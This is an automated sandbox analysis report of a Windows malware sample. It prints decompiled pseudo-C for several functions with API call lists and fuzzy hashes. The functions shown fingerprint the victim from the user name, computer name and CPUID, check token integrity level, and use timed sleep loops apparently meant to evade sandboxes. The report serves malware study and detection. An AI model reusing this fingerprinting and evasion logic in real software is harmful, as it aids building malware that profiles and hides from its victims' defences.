Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: aa8967cf6f4dde76c02ebe7914d4d2b72d9fa87f563f34c36f05b00a84cf9cb9
Instruction ID: 6b523f4d56b07308ce9bdd57cf6f62ed312335d387754ae27d97e6ac8d6923eb
Opcode Fuzzy Hash: aa8967cf6f4dde76c02ebe7914d4d2b72d9fa87f563f34c36f05b00a84cf9cb9
Instruction Fuzzy Hash: 7721A2B2A01204FBEB119B64CC05FDD77B9EB84754FA44525FB05EB2C1EA78B905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04773946, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E04773946(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x477a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E0477354E( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x477a2cc ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x477a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E04773F12(_v8 + _v8, _t63);
							}
							HeapFree( *0x477a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x477a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E04773F12(_v8 + _v8, _t63);
						}
						HeapFree( *0x477a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x04773946
0x0477394e
0x04773954
0x04773957
0x0477395a
0x0477395c
0x04773961
0x04773961
0x04773967
0x04773969
0x04773976
0x047739d7
0x04773978
0x0477397d
0x04773983
0x04773988
0x04773996
0x0477399a
0x047739a9
0x047739b0
0x047739b7
0x047739b7
0x047739c2
0x047739c2
0x0477399a
0x04773988
0x047739d9
0x047739df
0x047739e9
0x047739eb
0x047739f0
0x047739ff
0x04773a03
0x04773a0e
0x04773a15
0x04773a1c
0x04773a1c
0x04773a28
0x04773a28
0x04773a03
0x04773a31
0x04773a33
0x04773a36
0x04773a38
0x04773a3b
0x04773a3e
0x04773a48
0x04773a4c
0x04773a50

APIs

GetUserNameW.ADVAPI32(00000000,04772F3F), ref: 0477397D
RtlAllocateHeap.NTDLL(00000000,04772F3F), ref: 04773994
GetUserNameW.ADVAPI32(00000000,04772F3F), ref: 047739A1
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,04772F3F,?,?,?,?,?,047744F9,?,00000001), ref: 047739C2
GetComputerNameW.KERNEL32(00000000,00000000), ref: 047739E9
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 047739FD
GetComputerNameW.KERNEL32(00000000,00000000), ref: 04773A0A
HeapFree.KERNEL32(00000000,00000000), ref: 04773A28

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 4cd4c370e130cc7499bbe963182ec8ddcf9fab3869dacc3c7de5b246dd0a786d
Instruction ID: 69f74d6f513640bc264cf4155b6e18caa129bb3cc1cffd30083e6ac64ce95938
Opcode Fuzzy Hash: 4cd4c370e130cc7499bbe963182ec8ddcf9fab3869dacc3c7de5b246dd0a786d
Instruction Fuzzy Hash: C8311C71A10209EFEB11DFA9DD85EAEB7F9EB84714F908429E905E3211D734EE04EB10

Uniqueness

Uniqueness Score: -1.00%

Function 04772D63, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E04772D63(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E04775901();
				if(_t27 != 0) {
					_t77 =  *0x477a2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x477a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x477a14c(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E04774097( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x477a2d0; // 0x96d5a8
					_push(0x477a2d8);
					_push(1);
					_t7 = _t32 + 0x477b5bc; // 0x4d283a53
					 *0x477a2d4 = 0xc;
					 *0x477a2dc = 0;
					L04775EC2();
					_t36 = E047757AD(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E04773946(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E04775C4E(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x477a2d0; // 0x96d5a8
								_t18 = _t64 + 0x477b916; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x477a328 = _t87;
						}
						_t38 = E04772304();
						 *0x477a2c8 =  *0x477a2c8 ^ 0xe8fa7dd7;
						 *0x477a318 = _t38;
						_t39 = E04775C4E(0x60);
						__eflags = _t39;
						 *0x477a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x477a37c; // 0x50e9630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x477a37c; // 0x50e9630
							 *_t56 = 0x477b882;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x477a290, _t84, 0x52);
							__eflags = _t42;
							 *0x477a310 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x477a2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x477a2d0; // 0x96d5a8
								_t19 = _t76 + 0x477b212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x47792c7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E04773946( ~_v8 &  *0x477a2c8, 0x477a00c); // executed
								_t84 = E0477374B(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E04773E8F(_t73); // executed
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E04771B47(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E04775D26(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x477a150();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E047763CD(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x04772d63
0x04772d6e
0x04772d71
0x04772d74
0x04772d77
0x04772d7e
0x04772d80
0x04772d8c
0x04772d8e
0x04772d8e
0x04772d97
0x04772d9f
0x04772da2
0x04772dbc
0x04772dc1
0x04772dc2
0x04772dc4
0x04772dc9
0x04772dce
0x04772dd0
0x04772dd7
0x04772de1
0x04772de7
0x04772df4
0x04772dfb
0x04772e00
0x04772e00
0x04772e09
0x04772e32
0x04772e35
0x04772e42
0x04772e49
0x04772e55
0x04772e57
0x04772e59
0x04772e5e
0x04772e64
0x04772e6a
0x04772e70
0x04772e73
0x04772e78
0x04772e80
0x04772e82
0x04772e82
0x04772e85
0x04772e85
0x04772e8b
0x04772e90
0x04772e98
0x04772e9d
0x04772ea2
0x04772ea4
0x04772ea9
0x04772ed8
0x04772eab
0x04772eb0
0x04772eb5
0x04772eba
0x04772ec1
0x04772ec7
0x04772ecc
0x04772ed2
0x04772ed2
0x04772ed9
0x04772edb
0x04772eea
0x04772ef0
0x04772ef2
0x04772ef7
0x04772f23
0x04772ef9
0x04772ef9
0x04772eff
0x04772f0c
0x04772f12
0x04772f12
0x04772f1a
0x04772f1c
0x04772f24
0x04772f26
0x04772f2d
0x04772f3a
0x04772f44
0x04772f46
0x04772f48
0x00000000
0x00000000
0x04772f4a
0x04772f4f
0x04772f51
0x04772f58
0x04772f5c
0x04772f5f
0x04772f74
0x04772f78
0x04772f7d
0x00000000
0x04772f7d
0x04772f61
0x04772f63
0x00000000
0x00000000
0x04772f65
0x04772f6e
0x04772f70
0x04772f72
0x00000000
0x00000000
0x00000000
0x04772f72
0x04772f55
0x04772f55
0x04772f26
0x04772e0b
0x04772e0b
0x04772e10
0x04772f7f
0x04772f83
0x04772f8b
0x04772f8b
0x00000000
0x04772f83
0x04772e16
0x04772e19
0x04772e19
0x04772e1b
0x04772e1e
0x04772e26
0x04772e2d
0x00000000
0x04772f93
0x04772f93
0x04772f96
0x04772f9b
0x04772f9b

APIs

Part of subcall function 04775901: GetModuleHandleA.KERNEL32(4C44544E,00000000,04772D7C,00000000,00000000,00000000,?,?,?,?,?,047744F9,?,00000001), ref: 04775910

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0477A2D8,00000000), ref: 04772DE7
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,047744F9,?,00000001), ref: 04772E00
wsprintfA.USER32 ref: 04772E80
memset.NTDLL ref: 04772EB0
RtlInitializeCriticalSection.NTDLL(050E95F0), ref: 04772EC1
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 04772EEA
wsprintfA.USER32 ref: 04772F1A

Part of subcall function 04773946: GetUserNameW.ADVAPI32(00000000,04772F3F), ref: 0477397D
Part of subcall function 04773946: RtlAllocateHeap.NTDLL(00000000,04772F3F), ref: 04773994
Part of subcall function 04773946: GetUserNameW.ADVAPI32(00000000,04772F3F), ref: 047739A1
Part of subcall function 04773946: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,04772F3F,?,?,?,?,?,047744F9,?,00000001), ref: 047739C2
Part of subcall function 04773946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 047739E9
Part of subcall function 04773946: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 047739FD
Part of subcall function 04773946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 04773A0A
Part of subcall function 04773946: HeapFree.KERNEL32(00000000,00000000), ref: 04773A28

Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: 7c0c0db7ebbf7b38b90832e193bf60661e2f81643ca2f6f55f079c79a00f4b53
Instruction ID: 1fe393da79293eaca0e92c0547078966019bbe1ba951b1e80bb52020f6be1596
Opcode Fuzzy Hash: 7c0c0db7ebbf7b38b90832e193bf60661e2f81643ca2f6f55f079c79a00f4b53
Instruction Fuzzy Hash: 3651B0B1A00215ABFF21EFA4D888BAE77B8EB44714FD48595E914E7341E778BD40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04771041, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04771041(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x477a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04775C4E(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04772A03(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x0477104e
0x04771055
0x0477105c
0x04771070
0x0477107b
0x04771093
0x047710a0
0x047710a3
0x047710a8
0x047710b3
0x047710b7
0x047710c6
0x047710ca
0x047710e6
0x047710e6
0x047710ea
0x047710ea
0x047710ef
0x047710f3
0x047710f9
0x047710fa
0x04771101
0x04771107

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04771073
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 04771093
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 047710A3
CloseHandle.KERNEL32(00000000), ref: 047710F3

Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 047710C6
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 047710CE
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 047710DE

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: a2e305e46c9f0598848046c0cd256ce6dbdd538bf8b58b40995ca7f331f87028
Instruction ID: 1d4843d0c1c589207e001aa7ce59cd6f35a54e36179255e0b74d4e98f611bb19
Opcode Fuzzy Hash: a2e305e46c9f0598848046c0cd256ce6dbdd538bf8b58b40995ca7f331f87028
Instruction Fuzzy Hash: 48214A7590025EFFEF109F90CC84EEEBBB9EB08304F8044A5EA10A6250DB755A44EB50

Uniqueness

Uniqueness Score: -1.00%

Function 04774430, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E04774430(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x477a290 = _t14;
				if(_t14 != 0) {
					 *0x477a180 = GetTickCount();
					_t16 = E04772A18(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L047780B2();
						_t40 = _t18 + _t20;
						_t22 = E04773F5D(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x477a2ac; // 0x2ec
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x477a2b8 = 1; // executed
						}
					}
					_t16 = E04772D63(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x04774430
0x04774445
0x0477444d
0x04774452
0x04774465
0x0477446a
0x04774471
0x047744f9
0x047744ff
0x00000000
0x00000000
0x00000000
0x04774477
0x04774477
0x0477447c
0x04774482
0x04774488
0x04774492
0x04774496
0x04774497
0x0477449c
0x0477449d
0x0477449e
0x047744a3
0x047744a9
0x047744b2
0x047744b8
0x047744be
0x047744c3
0x047744ca
0x047744ce
0x047744d6
0x047744de
0x047744e0
0x047744e0
0x047744e8
0x047744ea
0x047744ea
0x047744e8
0x047744f4
0x00000000
0x047744f4
0x04774456
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04774445
GetTickCount.KERNEL32 ref: 0477445C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 0477447C
SwitchToThread.KERNEL32(?,00000001), ref: 04774482
_aullrem.NTDLL(?,?,00000009,00000000), ref: 0477449E
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 047744B8
IsWow64Process.KERNEL32(000002EC,?,?,00000001), ref: 047744D6

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: 57921610525a5a69e584719d6a1251edf2aa038da230b0cae50a80836b0d2152
Instruction ID: 58ee6124e4a19ac53e4bbdb14f425aa3e102ea0741fbc7f2025034890be1a9f9
Opcode Fuzzy Hash: 57921610525a5a69e584719d6a1251edf2aa038da230b0cae50a80836b0d2152
Instruction Fuzzy Hash: 0B2178F2644305AFEB109F64DC89AAE77E8F744254F848929F655C2240E778AC44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04775AE3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E04775AE3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x477a2d0; // 0x96d5a8
				_t1 = _t9 + 0x477b61b; // 0x253d7325
				_t36 = 0;
				_t28 = E047747BA(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x50e9631
					_t40 = E04775C4E(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E04771AF1(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E04772A03(_t40);
						_t42 = E0477332F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04772A03(_t36);
							_t36 = _t42;
						}
						_t43 = E04774138(_t36, _t33);
						if(_t43 != 0) {
							E04772A03(_t36);
							_t36 = _t43;
						}
					}
					E04772A03(_t28);
				}
				return _t36;
			}

0x04775ae3
0x04775ae6
0x04775ae7
0x04775aee
0x04775af5
0x04775afc
0x04775b00
0x04775b07
0x04775b0e
0x04775b13
0x04775b1b
0x04775b25
0x04775b29
0x04775b2d
0x04775b33
0x04775b38
0x04775b42
0x04775b48
0x04775b4a
0x04775b61
0x04775b65
0x04775b68
0x04775b6d
0x04775b6d
0x04775b76
0x04775b7a
0x04775b7d
0x04775b82
0x04775b82
0x04775b7a
0x04775b85
0x04775b8a
0x04775b90

APIs

Part of subcall function 047747BA: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04775AFC,253D7325,00000000,00000000,?,00000000,04776301), ref: 04774821
Part of subcall function 047747BA: sprintf.NTDLL ref: 04774842

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,04776301,00000000,050E9630), ref: 04775B0E
lstrlen.KERNEL32(00000000,?,00000000,04776301,00000000,050E9630), ref: 04775B16

Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A

strcpy.NTDLL ref: 04775B2D
lstrcat.KERNEL32(00000000,00000000), ref: 04775B38

Part of subcall function 04771AF1: lstrlen.KERNEL32(00000000,00000000,04776301,00000000,?,04775B47,00000000,04776301,?,00000000,04776301,00000000,050E9630), ref: 04771B02

Part of subcall function 04772A03: RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04776301,?,00000000,04776301,00000000,050E9630), ref: 04775B55

Part of subcall function 0477332F: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,04775B61,00000000,?,00000000,04776301,00000000,050E9630), ref: 04773339
Part of subcall function 0477332F: _snprintf.NTDLL ref: 04773397

Strings

=, xrefs: 04775B4F

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 7ee34c1e63e7d585d911ee0e502a0d1979857d789dfbc00dfe8607b987de17cb
Instruction ID: 83f879db3c4a5c5af7c8c9fb91708b355d5481aa9bfedba1488d3ae314007924
Opcode Fuzzy Hash: 7ee34c1e63e7d585d911ee0e502a0d1979857d789dfbc00dfe8607b987de17cb
Instruction Fuzzy Hash: 89115173D011257B6F2277749C88CAE379D9F8566838A4555F90497301DE78FD0297E0

Uniqueness

Uniqueness Score: -1.00%

Function 6C53E710, Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6C53E714

Part of subcall function 6C5427F1: _setlocale.LIBCMT ref: 6C54280A

_free.LIBCMT ref: 6C53E724

Part of subcall function 6C543F97: HeapFree.KERNEL32(00000000,00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FAB
Part of subcall function 6C543F97: GetLastError.KERNEL32(00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FBD

_free.LIBCMT ref: 6C53E73B
_free.LIBCMT ref: 6C53E752
_free.LIBCMT ref: 6C53E769
_free.LIBCMT ref: 6C53E780
_free.LIBCMT ref: 6C53E797

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 6f91f8754ef23c16e43dc6d4917a315c775c50e139badb3c96fa59e59bb81cd4
Instruction ID: 87ed361d010c702af45d974c8f4297a791f0413c04180c94fd8c94ab921fac55
Opcode Fuzzy Hash: 6f91f8754ef23c16e43dc6d4917a315c775c50e139badb3c96fa59e59bb81cd4
Instruction Fuzzy Hash: 48011BF0A01B509BFA20CA359C4CB5777E85F10748F008928D85ACBB40F77AF90C8B96

Uniqueness

Uniqueness Score: -1.00%

Function 04771671, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 047716B2
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 04771734
StrStrIW.SHLWAPI(00000000,006E0069), ref: 04771773
SysFreeString.OLEAUT32(00000000), ref: 04771795

Part of subcall function 047713B4: SysAllocString.OLEAUT32(047792D0), ref: 04771404

SafeArrayDestroy.OLEAUT32(?), ref: 047717E9
SysFreeString.OLEAUT32(?), ref: 047717F7

Part of subcall function 04775872: Sleep.KERNELBASE(000001F4), ref: 047758BA

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: b4ae6b94d23ebbbddaf9ec27652ebb7b4bd9fb53003058494eaba7caf7960597
Instruction ID: 2ed787226ca415104fe687ab88c78f2736c995a5c6bc5468c703506305343141
Opcode Fuzzy Hash: b4ae6b94d23ebbbddaf9ec27652ebb7b4bd9fb53003058494eaba7caf7960597
Instruction Fuzzy Hash: 1951107690020DAFDF10DFA4C8888EEB7BAFF88350B958868E545EB310D735AD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0477344C, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 047734A3
SysAllocString.OLEAUT32(047720DE), ref: 047734E6
SysFreeString.OLEAUT32(00000000), ref: 047734FA
SysFreeString.OLEAUT32(00000000), ref: 04773508

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 7c0db3dbf248f1c0478a43e6f8c8102d2b3beb94444eaacad1775246e06de11b
Instruction ID: 23a7868cca8a30786c062377da147b11fbe2688b5b4d9366adc42b4f49a1a295
Opcode Fuzzy Hash: 7c0db3dbf248f1c0478a43e6f8c8102d2b3beb94444eaacad1775246e06de11b
Instruction Fuzzy Hash: BF31FEB2900149EFCB05DFA9D4C48EE7BB5FF48344B50842EF906A7210E735AA45DFA1

Uniqueness

Uniqueness Score: -1.00%

